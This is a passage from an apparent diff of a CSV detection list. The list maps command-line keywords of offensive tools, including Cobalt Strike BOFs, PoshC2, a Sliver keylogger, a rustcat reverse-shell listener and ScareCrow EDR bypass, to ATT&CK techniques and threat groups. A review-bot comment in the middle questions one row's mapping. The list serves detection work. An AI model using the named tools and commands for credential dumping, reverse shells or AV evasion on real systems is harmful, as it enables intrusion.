T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 
- T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","10","10","1097","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"raw_keylogger *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","0","N/A","N/A","2","127","38","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" +"rcat listen *","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"RedGuard -*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 
T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "remotereg *","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","0","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "rev2self*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","0","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" -"runof *.o*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"runpe *.exe*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"runof *.o*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"runpe *.exe*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - 
T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "samdump *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"ScareCrow -*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"ScareCrow -*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "scrun.exe *","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","0","N/A","10","10","177","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" "set CMD *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "set ENDPOINT *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" 
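Review bot: The added `rcat listen *` row maps rustcat to `T1090.001 - T1090.002 - T1046` and `TA0011 - TA0009 - TA0040`, which describes a proxy and a port scanner rather than the "Port listener and Reverse shell" named in the row's own description. Of the tactics, only `TA0011` matches the row's `C2` category, so analysts pivoting on technique in a SIEM will file a hit under the wrong behaviour; something like `T1095 - T1059` with `TA0011 - TA0002` would be closer. The keyword also covers only the listening side, which normally runs on the operator's machine. With `metadata_enable_endpoint_detection` at `1` it will therefore mostly fire when a listener is opened on a monitored host. If no row elsewhere in the file (outside this hunk) covers the connecting side, a companion keyword for it would close that gap.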
@@ -18767,19 +18957,19 @@ "sh_executor *","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" "sharescan *.txt","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "shell.exe -u http://*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/jas502n/bypassAV-1","1","0","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" -"ShellCmd *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"ShellCmd *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "show shellcodes","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" -"SigFlip *","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"SigFlip *.exe*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"SigFlip *","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"SigFlip *.exe*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "sleeper force","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "sleeper off","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "sleeper on","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "sniffer -*","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","0","N/A","N/A","7","668","58","2022-07-27T15:13:57Z","2021-11-08T15:36:03Z" -"spawn *.exe *.bin*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. 
and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","0","N/A","10","10","407","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" +"spawn *.exe *.bin*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. 
